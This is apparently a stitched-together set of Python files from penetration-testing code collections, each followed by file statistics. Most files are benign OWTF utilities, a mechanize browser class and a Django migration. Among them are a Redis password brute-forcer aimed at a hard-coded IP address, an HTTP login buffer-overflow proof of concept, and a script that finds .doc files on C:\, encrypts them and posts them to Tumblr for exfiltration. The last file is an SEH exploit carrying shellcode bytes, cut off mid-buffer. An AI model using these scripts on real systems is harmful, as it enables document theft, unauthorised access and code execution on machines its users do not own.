self.sp.task_done()
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['redis']):
printPink("crack redis now...")
print "[*] start crack redis %s" % time.ctime()
starttime=time.time()
for i in xrange(threads):
t = Thread(target=self.redisexp)
t.setDaemon(True)
t.start()
for ip in ipdict['redis']:
self.sp.put((str(ip).split(':')[0],int(str(ip).split(':')[1])))
self.sp.join()
print "[*] stop redis serice %s" % time.ctime()
print "[*] crack redis done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'redis': ['101.201.177.35:6379']}
pinglist=['101.201.177.35']
test=redis_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
| 28.925373 | 105 | 0.541916 |
owtf | """
owtf.utils.strings
~~~~~~~~~~~~~~~~~~
"""
import base64
import binascii
import logging
import os
import re
from collections import defaultdict
import six
from owtf.settings import REPLACEMENT_DELIMITER
search_regex = re.compile("{!s}([a-zA-Z0-9-_]*?){!s}".format(REPLACEMENT_DELIMITER, REPLACEMENT_DELIMITER))
def utf8(string):
if isinstance(string, six.string_types):
return string.encode("utf8")
return string
def to_str(byte):
if isinstance(byte, bytes):
return byte.decode("utf-8", "ignore")
return byte
def str2bool(string):
"""Converts a string to a boolean
:param string: String to convert
:type string: `str`
:return: Boolean equivalent
:rtype: `bool`
"""
return not (string in ["False", "false", 0, "0"])
def multi_replace(text, replace_dict, simple_text=False):
"""Recursive multiple replacement function
:param text: Text to replace
:type text: `str`
:param replace_dict: The parameter dict to be replaced with
:type replace_dict: `dict`
:return: The modified text after replacement
:rtype: `str`
"""
new_text = text
if not simple_text:
for key in search_regex.findall(new_text):
# Check if key exists in the replace dict ;)
if replace_dict.get(key, None):
# A recursive call to remove all level occurrences of place
# holders.
new_text = new_text.replace(
REPLACEMENT_DELIMITER + key + REPLACEMENT_DELIMITER, multi_replace(replace_dict[key], replace_dict)
)
new_text = os.path.expanduser(new_text)
else:
for key in replace_dict.keys():
# A recursive call to remove all level occurrences of place
# holders.
new_text = new_text.replace(key, replace_dict[key])
new_text = os.path.expanduser(new_text)
return new_text
def get_as_list(key_list):
"""Get values for keys in a list
:param key_list: List of keys
:type key_list: `list`
:return: List of corresponding values
:rtype: `list`
"""
from owtf.config import config_handler
value_list = []
for key in key_list:
value_list.append(config_handler.get_val(key))
return value_list
def get_header_list(key):
"""Get list from a string of values for a key
:param key: Key
:type key: `str`
:return: List of values
:rtype: `list`
"""
from owtf.config import config_handler
return config_handler.get_val(key).split(",")
def pad_key(key):
"""Add delimiters.
:param key: Key to pad
:type key: `str`
:return: Padded key string
:rtype: `str`
"""
return REPLACEMENT_DELIMITER + key + REPLACEMENT_DELIMITER
def strip_key(key):
"""Replaces key with empty space
:param key: Key to clear
:type key: `str`
:return: Empty key
:rtype: `str`
"""
return key.replace(REPLACEMENT_DELIMITER, "")
def multi_replace_dict(text, replace_dict):
"""Perform multiple replacements in one go using the replace dictionary
in format: { 'search' : 'replace' }
:param text: Text to replace
:type text: `str`
:param replace_dict: The replacement strings in a dict
:type replace_dict: `dict`
:return: `str`
:rtype:
"""
new_text = text
for search, replace in list(replace_dict.items()):
new_text = new_text.replace(search, str(replace))
return new_text
def wipe_bad_chars(filename):
"""The function wipes bad characters from name of output file
:param filename: The file name to scrub
:type filename: `str`
:return: New replaced file filename
:rtype: `str`
"""
return multi_replace(filename, {"(": "", " ": "_", ")": "", "/": "_"}, True)
def remove_blanks_list(src):
"""Removes empty elements from the list
:param src: List
:type src: `list`
:return: New list without blanks
:rtype: `list`
"""
return [el for el in src if el]
def list_to_dict_keys(list):
"""Convert a list to dict with keys from list items
:param list: list to convert
:type list: `list`
:return: The newly formed dictionary
:rtype: `dict`
"""
dictionary = defaultdict(list)
for item in list:
dictionary[item] = ""
return dictionary
def add_to_dict(from_dict, to_dict):
"""Add the items from dict a with copy attribute to dict b
:param from_dict: Dict to copy from
:type from_dict: `dict`
:param to_dict: Dict to copy to
:type to_dict: `dict`
:return: None
:rtype: None
"""
for k, v in list(from_dict.items()):
if hasattr(v, "copy") and callable(getattr(v, "copy")):
to_dict[k] = v.copy()
else:
to_dict[k] = v
def merge_dicts(a, b):
"""Returns a by-value copy contained the merged content of the 2 passed
dictionaries
:param a: Dict a
:type a: `dict`
:param b: Dict b
:type b: `dict`
:return: New merge dict
:rtype: `dict`
"""
new_dict = defaultdict(list)
add_to_dict(a, new_dict)
add_to_dict(b, new_dict)
return new_dict
def truncate_lines(str, num_lines, eol="\n"):
"""Truncate and remove EOL characters
:param str: String to truncate
:type str: `str`
:param num_lines: Number of lines to process
:type num_lines: `int`
:param EOL: EOL char
:type EOL: `char`
:return: Joined string after truncation
:rtype: `str`
"""
return eol.join(str.split(eol)[0:num_lines])
def get_random_str(len):
"""Function returns random strings of length len
:param len: Length
:type len: `int`
:return: Random generated string
:rtype: `str`
"""
return base64.urlsafe_b64encode(os.urandom(len))[0:len]
def gen_secure_random_str():
return binascii.hexlify(os.urandom(32))
def scrub_output(output):
"""Remove all ANSI control sequences from the output
:param output: Output to scrub
:type output: `str`
:return: Scrubbed output
:rtype: `str`
"""
ansi_escape = re.compile(r"\x1b[^m]*m")
return ansi_escape.sub("", output)
def paths_exist(path_list):
"""Check if paths in the list exist
:param path_list: The list of paths to check
:type path_list: `list`
:return: True if valid paths, else False
:rtype: `bool`
"""
valid = True
for path in path_list:
if path and not os.path.exists(path):
logging.log("WARNING: The path %s does not exist!", path)
valid = False
return valid
def is_convertable(value, conv):
"""Convert a value
:param value:
:type value:
:param conv:
:type conv:
:return:
:rtype:
"""
try:
return conv(value)
except ValueError:
return None
def str_to_dict(string):
"""Convert a string to a dict
:param string: String to convert
:type string: `str`
:return: Resultant dict
:rtype: `dict`
"""
dict = defaultdict(list)
count = 0
prev_item = ""
for item in string.strip().split("="):
if count % 2 == 1: # Key.
dict[prev_item] = item
else: # Value.
dict[item] = ""
prev_item = item
count += 1
return dict
| 23.125828 | 119 | 0.607275 |
PenetrationTestingScripts | """Stateful programmatic WWW navigation, after Perl's WWW::Mechanize.
Copyright 2003-2006 John J. Lee <jjl@pobox.com>
Copyright 2003 Andy Lester (original Perl code)
This code is free software; you can redistribute it and/or modify it
under the terms of the BSD or ZPL 2.1 licenses (see the file COPYING.txt
included with the distribution).
"""
import copy, re, os, urllib, urllib2
from _html import DefaultFactory
import _response
import _request
import _rfc3986
import _sockettimeout
import _urllib2_fork
from _useragent import UserAgentBase
class BrowserStateError(Exception): pass
class LinkNotFoundError(Exception): pass
class FormNotFoundError(Exception): pass
def sanepathname2url(path):
urlpath = urllib.pathname2url(path)
if os.name == "nt" and urlpath.startswith("///"):
urlpath = urlpath[2:]
# XXX don't ask me about the mac...
return urlpath
class History:
"""
Though this will become public, the implied interface is not yet stable.
"""
def __init__(self):
self._history = [] # LIFO
def add(self, request, response):
self._history.append((request, response))
def back(self, n, _response):
response = _response # XXX move Browser._response into this class?
while n > 0 or response is None:
try:
request, response = self._history.pop()
except IndexError:
raise BrowserStateError("already at start of history")
n -= 1
return request, response
def clear(self):
del self._history[:]
def close(self):
for request, response in self._history:
if response is not None:
response.close()
del self._history[:]
class HTTPRefererProcessor(_urllib2_fork.BaseHandler):
def http_request(self, request):
# See RFC 2616 14.36. The only times we know the source of the
# request URI has a URI associated with it are redirect, and
# Browser.click() / Browser.submit() / Browser.follow_link().
# Otherwise, it's the user's job to add any Referer header before
# .open()ing.
if hasattr(request, "redirect_dict"):
request = self.parent._add_referer_header(
request, origin_request=False)
return request
https_request = http_request
class Browser(UserAgentBase):
"""Browser-like class with support for history, forms and links.
BrowserStateError is raised whenever the browser is in the wrong state to
complete the requested operation - e.g., when .back() is called when the
browser history is empty, or when .follow_link() is called when the current
response does not contain HTML data.
Public attributes:
request: current request (mechanize.Request)
form: currently selected form (see .select_form())
"""
handler_classes = copy.copy(UserAgentBase.handler_classes)
handler_classes["_referer"] = HTTPRefererProcessor
default_features = copy.copy(UserAgentBase.default_features)
default_features.append("_referer")
def __init__(self,
factory=None,
history=None,
request_class=None,
):
"""
Only named arguments should be passed to this constructor.
factory: object implementing the mechanize.Factory interface.
history: object implementing the mechanize.History interface. Note
this interface is still experimental and may change in future.
request_class: Request class to use. Defaults to mechanize.Request
The Factory and History objects passed in are 'owned' by the Browser,
so they should not be shared across Browsers. In particular,
factory.set_response() should not be called except by the owning
Browser itself.
Note that the supplied factory's request_class is overridden by this
constructor, to ensure only one Request class is used.
"""
self._handle_referer = True
if history is None:
history = History()
self._history = history
if request_class is None:
request_class = _request.Request
if factory is None:
factory = DefaultFactory()
factory.set_request_class(request_class)
self._factory = factory
self.request_class = request_class
self.request = None
self._set_response(None, False)
# do this last to avoid __getattr__ problems
UserAgentBase.__init__(self)
def close(self):
UserAgentBase.close(self)
if self._response is not None:
self._response.close()
if self._history is not None:
self._history.close()
self._history = None
# make use after .close easy to spot
self.form = None
self.request = self._response = None
self.request = self.response = self.set_response = None
self.geturl = self.reload = self.back = None
self.clear_history = self.set_cookie = self.links = self.forms = None
self.viewing_html = self.encoding = self.title = None
self.select_form = self.click = self.submit = self.click_link = None
self.follow_link = self.find_link = None
def set_handle_referer(self, handle):
"""Set whether to add Referer header to each request."""
self._set_handler("_referer", handle)
self._handle_referer = bool(handle)
def _add_referer_header(self, request, origin_request=True):
if self.request is None:
return request
scheme = request.get_type()
original_scheme = self.request.get_type()
if scheme not in ["http", "https"]:
return request
if not origin_request and not self.request.has_header("Referer"):
return request
if (self._handle_referer and
original_scheme in ["http", "https"] and
not (original_scheme == "https" and scheme != "https")):
# strip URL fragment (RFC 2616 14.36)
parts = _rfc3986.urlsplit(self.request.get_full_url())
parts = parts[:-1]+(None,)
referer = _rfc3986.urlunsplit(parts)
request.add_unredirected_header("Referer", referer)
return request
def open_novisit(self, url, data=None,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
"""Open a URL without visiting it.
Browser state (including request, response, history, forms and links)
is left unchanged by calling this function.
The interface is the same as for .open().
This is useful for things like fetching images.
See also .retrieve().
"""
return self._mech_open(url, data, visit=False, timeout=timeout)
def open(self, url, data=None,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
return self._mech_open(url, data, timeout=timeout)
def _mech_open(self, url, data=None, update_history=True, visit=None,
timeout=_sockettimeout._GLOBAL_DEFAULT_TIMEOUT):
try:
url.get_full_url
except AttributeError:
# string URL -- convert to absolute URL if required
scheme, authority = _rfc3986.urlsplit(url)[:2]
if scheme is None:
# relative URL
if self._response is None:
raise BrowserStateError(
"can't fetch relative reference: "
"not viewing any document")
url = _rfc3986.urljoin(self._response.geturl(), url)
request = self._request(url, data, visit, timeout)
visit = request.visit
if visit is None:
visit = True
if visit:
self._visit_request(request, update_history)
success = True
try:
response = UserAgentBase.open(self, request, data)
except urllib2.HTTPError, error:
success = False
if error.fp is None: # not a response
raise
response = error
## except (IOError, socket.error, OSError), error:
## # Yes, urllib2 really does raise all these :-((
## # See test_urllib2.py for examples of socket.gaierror and OSError,
## # plus note that FTPHandler raises IOError.
## # XXX I don't seem to have an example of exactly socket.error being
## # raised, only socket.gaierror...
## # I don't want to start fixing these here, though, since this is a
## # subclass of OpenerDirector, and it would break old code. Even in
## # Python core, a fix would need some backwards-compat. hack to be
## # acceptable.
## raise
if visit:
self._set_response(response, False)
response = copy.copy(self._response)
elif response is not None:
response = _response.upgrade_response(response)
if not success:
raise response
return response
def __str__(self):
text = []
text.append("<%s " % self.__class__.__name__)
if self._response:
text.append("visiting %s" % self._response.geturl())
else:
text.append("(not visiting a URL)")
if self.form:
text.append("\n selected form:\n %s\n" % str(self.form))
text.append(">")
return "".join(text)
def response(self):
"""Return a copy of the current response.
The returned object has the same interface as the object returned by
.open() (or mechanize.urlopen()).
"""
return copy.copy(self._response)
def open_local_file(self, filename):
path = sanepathname2url(os.path.abspath(filename))
url = 'file://'+path
return self.open(url)
def set_response(self, response):
"""Replace current response with (a copy of) response.
response may be None.
This is intended mostly for HTML-preprocessing.
"""
self._set_response(response, True)
def _set_response(self, response, close_current):
# sanity check, necessary but far from sufficient
if not (response is None or
(hasattr(response, "info") and hasattr(response, "geturl") and
hasattr(response, "read")
)
):
raise ValueError("not a response object")
self.form = None
if response is not None:
response = _response.upgrade_response(response)
if close_current and self._response is not None:
self._response.close()
self._response = response
self._factory.set_response(response)
def visit_response(self, response, request=None):
"""Visit the response, as if it had been .open()ed.
Unlike .set_response(), this updates history rather than replacing the
current response.
"""
if request is None:
request = _request.Request(response.geturl())
self._visit_request(request, True)
self._set_response(response, False)
def _visit_request(self, request, update_history):
if self._response is not None:
self._response.close()
if self.request is not None and update_history:
self._history.add(self.request, self._response)
self._response = None
# we want self.request to be assigned even if UserAgentBase.open
# fails
self.request = request
def geturl(self):
"""Get URL of current document."""
if self._response is None:
raise BrowserStateError("not viewing any document")
return self._response.geturl()
def reload(self):
"""Reload current document, and return response object."""
if self.request is None:
raise BrowserStateError("no URL has yet been .open()ed")
if self._response is not None:
self._response.close()
return self._mech_open(self.request, update_history=False)
def back(self, n=1):
"""Go back n steps in history, and return response object.
n: go back this number of steps (default 1 step)
"""
if self._response is not None:
self._response.close()
self.request, response = self._history.back(n, self._response)
self.set_response(response)
if not response.read_complete:
return self.reload()
return copy.copy(response)
def clear_history(self):
self._history.clear()
def set_cookie(self, cookie_string):
"""Request to set a cookie.
Note that it is NOT necessary to call this method under ordinary
circumstances: cookie handling is normally entirely automatic. The
intended use case is rather to simulate the setting of a cookie by
client script in a web page (e.g. JavaScript). In that case, use of
this method is necessary because mechanize currently does not support
JavaScript, VBScript, etc.
The cookie is added in the same way as if it had arrived with the
current response, as a result of the current request. This means that,
for example, if it is not appropriate to set the cookie based on the
current request, no cookie will be set.
The cookie will be returned automatically with subsequent responses
made by the Browser instance whenever that's appropriate.
cookie_string should be a valid value of the Set-Cookie header.
For example:
browser.set_cookie(
"sid=abcdef; expires=Wednesday, 09-Nov-06 23:12:40 GMT")
Currently, this method does not allow for adding RFC 2986 cookies.
This limitation will be lifted if anybody requests it.
"""
if self._response is None:
raise BrowserStateError("not viewing any document")
if self.request.get_type() not in ["http", "https"]:
raise BrowserStateError("can't set cookie for non-HTTP/HTTPS "
"transactions")
cookiejar = self._ua_handlers["_cookies"].cookiejar
response = self.response() # copy
headers = response.info()
headers["Set-cookie"] = cookie_string
cookiejar.extract_cookies(response, self.request)
def links(self, **kwds):
"""Return iterable over links (mechanize.Link objects)."""
if not self.viewing_html():
raise BrowserStateError("not viewing HTML")
links = self._factory.links()
if kwds:
return self._filter_links(links, **kwds)
else:
return links
def forms(self):
"""Return iterable over forms.
The returned form objects implement the mechanize.HTMLForm interface.
"""
if not self.viewing_html():
raise BrowserStateError("not viewing HTML")
return self._factory.forms()
def global_form(self):
"""Return the global form object, or None if the factory implementation
did not supply one.
The "global" form object contains all controls that are not descendants
of any FORM element.
The returned form object implements the mechanize.HTMLForm interface.
This is a separate method since the global form is not regarded as part
of the sequence of forms in the document -- mostly for
backwards-compatibility.
"""
if not self.viewing_html():
raise BrowserStateError("not viewing HTML")
return self._factory.global_form
def viewing_html(self):
"""Return whether the current response contains HTML data."""
if self._response is None:
raise BrowserStateError("not viewing any document")
return self._factory.is_html
def encoding(self):
if self._response is None:
raise BrowserStateError("not viewing any document")
return self._factory.encoding
def title(self):
r"""Return title, or None if there is no title element in the document.
Treatment of any tag children of attempts to follow Firefox and IE
(currently, tags are preserved).
"""
if not self.viewing_html():
raise BrowserStateError("not viewing HTML")
return self._factory.title
def select_form(self, name=None, predicate=None, nr=None):
"""Select an HTML form for input.
This is a bit like giving a form the "input focus" in a browser.
If a form is selected, the Browser object supports the HTMLForm
interface, so you can call methods like .set_value(), .set(), and
.click().
Another way to select a form is to assign to the .form attribute. The
form assigned should be one of the objects returned by the .forms()
method.
At least one of the name, predicate and nr arguments must be supplied.
If no matching form is found, mechanize.FormNotFoundError is raised.
If name is specified, then the form must have the indicated name.
If predicate is specified, then the form must match that function. The
predicate function is passed the HTMLForm as its single argument, and
should return a boolean value indicating whether the form matched.
nr, if supplied, is the sequence number of the form (where 0 is the
first). Note that control 0 is the first form matching all the other
arguments (if supplied); it is not necessarily the first control in the
form. The "global form" (consisting of all form controls not contained
in any FORM element) is considered not to be part of this sequence and
to have no name, so will not be matched unless both name and nr are
None.
"""
if not self.viewing_html():
raise BrowserStateError("not viewing HTML")
if (name is None) and (predicate is None) and (nr is None):
raise ValueError(
"at least one argument must be supplied to specify form")
global_form = self._factory.global_form
if nr is None and name is None and \
predicate is not None and predicate(global_form):
self.form = global_form
return
orig_nr = nr
for form in self.forms():
if name is not None and name != form.name:
continue
if predicate is not None and not predicate(form):
continue
if nr:
nr -= 1
continue
self.form = form
break # success
else:
# failure
description = []
if name is not None: description.append("name '%s'" % name)
if predicate is not None:
description.append("predicate %s" % predicate)
if orig_nr is not None: description.append("nr %d" % orig_nr)
description = ", ".join(description)
raise FormNotFoundError("no form matching "+description)
def click(self, *args, **kwds):
"""See mechanize.HTMLForm.click for documentation."""
if not self.viewing_html():
raise BrowserStateError("not viewing HTML")
request = self.form.click(*args, **kwds)
return self._add_referer_header(request)
def submit(self, *args, **kwds):
"""Submit current form.
Arguments are as for mechanize.HTMLForm.click().
Return value is same as for Browser.open().
"""
return self.open(self.click(*args, **kwds))
def click_link(self, link=None, **kwds):
"""Find a link and return a Request object for it.
Arguments are as for .find_link(), except that a link may be supplied
as the first argument.
"""
if not self.viewing_html():
raise BrowserStateError("not viewing HTML")
if not link:
link = self.find_link(**kwds)
else:
if kwds:
raise ValueError(
"either pass a Link, or keyword arguments, not both")
request = self.request_class(link.absolute_url)
return self._add_referer_header(request)
def follow_link(self, link=None, **kwds):
"""Find a link and .open() it.
Arguments are as for .click_link().
Return value is same as for Browser.open().
"""
return self.open(self.click_link(link, **kwds))
def find_link(self, **kwds):
"""Find a link in current page.
Links are returned as mechanize.Link objects.
# Return third link that .search()-matches the regexp "python"
# (by ".search()-matches", I mean that the regular expression method
# .search() is used, rather than .match()).
find_link(text_regex=re.compile("python"), nr=2)
# Return first http link in the current page that points to somewhere
# on python.org whose link text (after tags have been removed) is
# exactly "monty python".
find_link(text="monty python",
url_regex=re.compile("http.*python.org"))
# Return first link with exactly three HTML attributes.
find_link(predicate=lambda link: len(link.attrs) == 3)
Links include anchors (<a>), image maps (<area>), and frames (<frame>,
<iframe>).
All arguments must be passed by keyword, not position. Zero or more
arguments may be supplied. In order to find a link, all arguments
supplied must match.
If a matching link is not found, mechanize.LinkNotFoundError is raised.
text: link text between link tags: e.g. <a href="blah">this bit</a> (as
returned by pullparser.get_compressed_text(), ie. without tags but
with opening tags "textified" as per the pullparser docs) must compare
equal to this argument, if supplied
text_regex: link text between tag (as defined above) must match the
regular expression object or regular expression string passed as this
argument, if supplied
name, name_regex: as for text and text_regex, but matched against the
name HTML attribute of the link tag
url, url_regex: as for text and text_regex, but matched against the
URL of the link tag (note this matches against Link.url, which is a
relative or absolute URL according to how it was written in the HTML)
tag: element name of opening tag, e.g. "a"
predicate: a function taking a Link object as its single argument,
returning a boolean result, indicating whether the links
nr: matches the nth link that matches all other criteria (default 0)
"""
try:
return self._filter_links(self._factory.links(), **kwds).next()
except StopIteration:
raise LinkNotFoundError()
def __getattr__(self, name):
# pass through _form.HTMLForm methods and attributes
form = self.__dict__.get("form")
if form is None:
raise AttributeError(
"%s instance has no attribute %s (perhaps you forgot to "
".select_form()?)" % (self.__class__, name))
return getattr(form, name)
def _filter_links(self, links,
text=None, text_regex=None,
name=None, name_regex=None,
url=None, url_regex=None,
tag=None,
predicate=None,
nr=0
):
if not self.viewing_html():
raise BrowserStateError("not viewing HTML")
orig_nr = nr
for link in links:
if url is not None and url != link.url:
continue
if url_regex is not None and not re.search(url_regex, link.url):
continue
if (text is not None and
(link.text is None or text != link.text)):
continue
if (text_regex is not None and
(link.text is None or not re.search(text_regex, link.text))):
continue
if name is not None and name != dict(link.attrs).get("name"):
continue
if name_regex is not None:
link_name = dict(link.attrs).get("name")
if link_name is None or not re.search(name_regex, link_name):
continue
if tag is not None and tag != link.tag:
continue
if predicate is not None and not predicate(link):
continue
if nr:
nr -= 1
continue
yield link
nr = orig_nr
| 36.189552 | 82 | 0.60419 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalErrorCodes")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 27.454545 | 75 | 0.778846 |
owtf | """
PASSIVE Plugin for Testing for Open Amazon S3 Buckets(OWASP-CL-001)
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "GrayhatWarfare for Public S3 Buckets"
def run(PluginInfo):
resource = get_resources("PassiveOpenS3Buckets")
# Grayhat Warfare works better when we use Second Level Domain to search
domain = resource[0][1]
# Extract Second Level Domain
extract_sld = domain.rsplit(".", 1)
# Replace it in the resource
resource[0][1] = extract_sld[0]
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 27.130435 | 76 | 0.727554 |
owtf | """
tests.functional.cli.test_only
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from tests.owtftest import OWTFCliTestCase
class OWTFCliOnlyPluginsTest(OWTFCliTestCase):
categories = ["cli", "fast"]
def test_only_one_plugin(self):
"""Run OWTF with only one plugin."""
self.run_owtf(
"-s",
"-o",
"OWTF-WVS-001",
"%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT),
)
# Test WVS-001 active AND external were run.
self.assert_is_in_logs(
"Target: %s://%s:%s -> Plugin: Arachni Unauthenticated (web/active)"
% (self.PROTOCOL, self.IP, self.PORT),
name="Worker",
msg="Arachni web active plugin should have been run!",
)
self.assert_is_in_logs(
"Target: %s://%s:%s -> Plugin: Arachni Unauthenticated (web/external)"
% (self.PROTOCOL, self.IP, self.PORT),
name="Worker",
msg="Arachni web external plugin should have been run!",
)
# Test that no other plugin has been run.
self.assert_is_not_in_logs(
"3 - Target:", name="Worker", msg="No other plugins should have been run!"
)
# Test OWTF exited cleanly
self.assert_is_in_logs(
"All jobs have been done. Exiting.",
name="MainProcess",
msg="OWTF did not finish properly!",
)
def test_only_one_plugin_one_type(self):
"""Run OWTF with only one external plugin (regression #376)."""
self.run_owtf(
"-s",
"-o",
"OWTF-WVS-001",
"-t",
"external",
"%s://%s:%s" % (self.PROTOCOL, self.IP, self.PORT),
)
# Test WVS-001 external were run.
self.assert_is_in_logs(
"Target: %s://%s:%s -> Plugin: Arachni Unauthenticated (web/external)"
% (self.PROTOCOL, self.IP, self.PORT),
name="Worker",
msg="Arachni web external plugin should have been run!",
)
# Test that no other plugin has been run.
self.assert_is_not_in_logs(
"2 - Target:", name="Worker", msg="No other plugin should have been run!"
)
# Test OWTF exited cleanly
self.assert_is_in_logs(
"All jobs have been done. Exiting.",
name="MainProcess",
msg="OWTF did not finish properly!",
)
| 33 | 86 | 0.51982 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-07 22:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='NmapScan',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('target_text', models.CharField(max_length=1024)),
('cmd_text', models.CharField(max_length=256)),
('start_date', models.DateTimeField(verbose_name='date started')),
('end_date', models.DateTimeField(verbose_name='date end')),
],
),
]
| 28.074074 | 114 | 0.577806 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
junk = 'A'*780
eip = 'B'*4
pad = 'C'*(1000-780-4)
injection = junk + eip + pad
payload="username="+injection+"&password=A"
buffer="POST /login HTTP/1.1\r\n"
buffer+="Host: 192.168.129.128\r\n"
buffer+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Referer: http://192.168.129.128/login\r\n"
buffer+="Connection: close\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: "+str(len(payload))+"\r\n"
buffer+="\r\n"
buffer+=payload
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.129.128", 80))
s.send(buffer)
s.close()
| 27.642857 | 94 | 0.685393 |
owtf | """
GREP Plugin for Vulnerable Remember Password and Pwd Reset (OWASP-AT-006)
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for autocomplete protections"
def run(PluginInfo):
title = "This plugin looks for password and form tags to review the autocomplete attribute<br />"
Content = plugin_helper.HtmlString(title)
Content += plugin_helper.FindResponseBodyMatchesForRegexpName(
"RESPONSE_REGEXP_FOR_AUTOCOMPLETE"
)
return Content
| 34.058824 | 101 | 0.761345 |
cybersecurity-penetration-testing | import win32com.client
import os
import fnmatch
import time
import random
import zlib
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
doc_type = ".doc"
username = "test@test.com"
password = "testpassword"
public_key = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAyXUTgFoL/2EPKoN31l5T
lak7VxhdusNCWQKDfcN5Jj45GQ1oZZjsECQ8jK5AaQuCWdmEQkgCEV23L2y71G+T
h/zlVPjp0hgC6nOKOuwmlQ1jGvfVvaNZ0YXrs+sX/wg5FT/bTS4yzXeW6920tdls
2N7Pu5N1FLRW5PMhk6GW5rzVhwdDvnfaUoSVj7oKaIMLbN/TENvnwhZZKlTZeK79
ix4qXwYLe66CrgCHDf4oBJ/nO1oYwelxuIXVPhIZnVpkbz3IL6BfEZ3ZDKzGeRs6
YLZuR2u5KUbr9uabEzgtrLyOeoK8UscKmzOvtwxZDcgNijqMJKuqpNZczPHmf9cS
1wIDAQAB
-----END PUBLIC KEY-----"""
def wait_for_browser(browser):
# wait for the browser to finish loading a page
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
def encrypt_string(plaintext):
chunk_size = 256
print "Compressing: %d bytes" % len(plaintext)
plaintext = zlib.compress(plaintext)
print "Encrypting %d bytes" % len(plaintext)
rsakey = RSA.importKey(public_key)
rsakey = PKCS1_OAEP.new(rsakey)
encrypted = ""
offset = 0
while offset < len(plaintext):
chunk = plaintext[offset:offset+256]
if len(chunk) % chunk_size != 0:
chunk += " " * (chunk_size - len(chunk))
encrypted += rsakey.encrypt(chunk)
offset += chunk_size
encrypted = encrypted.encode("base64")
print "Base64 encoded crypto: %d" % len(encrypted)
return encrypted
def encrypt_post(filename):
# open and read the file
fd = open(filename,"rb")
contents = fd.read()
fd.close()
encrypted_title = encrypt_string(filename)
encrypted_body = encrypt_string(contents)
return encrypted_title,encrypted_body
def random_sleep():
time.sleep(random.randint(5,10))
return
def login_to_tumblr(ie):
# retrieve all elements in the document
full_doc = ie.Document.all
# iterate looking for the logout form
for i in full_doc:
if i.id == "signup_email":
i.setAttribute("value",username)
elif i.id == "signup_password":
i.setAttribute("value",password)
random_sleep()
# you can be presented with different homepages
try:
if ie.Document.forms[0].id == "signup_form":
ie.Document.forms[0].submit()
else:
ie.Document.forms[1].submit()
except IndexError, e:
pass
random_sleep()
# the login form is the second form on the page
wait_for_browser(ie)
return
def post_to_tumblr(ie,title,post):
full_doc = ie.Document.all
for i in full_doc:
if i.id == "post_one":
i.setAttribute("value",title)
title_box = i
i.focus()
elif i.id == "post_two":
i.setAttribute("innerHTML",post)
print "Set text area"
i.focus()
elif i.id == "create_post":
print "Found post button"
post_form = i
i.focus()
# move focus away from the main content box
random_sleep()
title_box.focus()
random_sleep()
# post the form
post_form.children[0].click()
wait_for_browser(ie)
random_sleep()
return
def exfiltrate(document_path):
ie = win32com.client.Dispatch("InternetExplorer.Application")
ie.Visible = 1
# head to tumblr and login
ie.Navigate("http://www.tumblr.com/login")
wait_for_browser(ie)
print "Logging in..."
login_to_tumblr(ie)
print "Logged in...navigating"
ie.Navigate("https://www.tumblr.com/new/text")
wait_for_browser(ie)
# encrypt the file
title,body = encrypt_post(document_path)
print "Creating new post..."
post_to_tumblr(ie,title,body)
print "Posted!"
# Destroy the IE instance
ie.Quit()
ie = None
return
# main loop for document discovery
for parent, directories, filenames in os.walk("C:\\"):
for filename in fnmatch.filter(filenames,"*%s" % doc_type):
document_path = os.path.join(parent,filename)
print "Found: %s" % document_path
exfiltrate(document_path)
raw_input("Continue?") | 23 | 75 | 0.644346 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
import socket
junk = 'A'*4061
nSEH='\xeb\x10\x90\x90'
SEH = '\xbf\xa1\x01\x10'
NOPs='\x90'*20
buf = ""
buf += "\xd9\xf6\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x53\xbb\xbb"
buf += "\x75\x92\x5d\x31\x58\x17\x83\xe8\xfc\x03\xe3\x66\x70"
buf += "\xa8\xef\x61\xf6\x53\x0f\x72\x97\xda\xea\x43\x97\xb9"
buf += "\x7f\xf3\x27\xc9\x2d\xf8\xcc\x9f\xc5\x8b\xa1\x37\xea"
buf += "\x3c\x0f\x6e\xc5\xbd\x3c\x52\x44\x3e\x3f\x87\xa6\x7f"
buf += "\xf0\xda\xa7\xb8\xed\x17\xf5\x11\x79\x85\xe9\x16\x37"
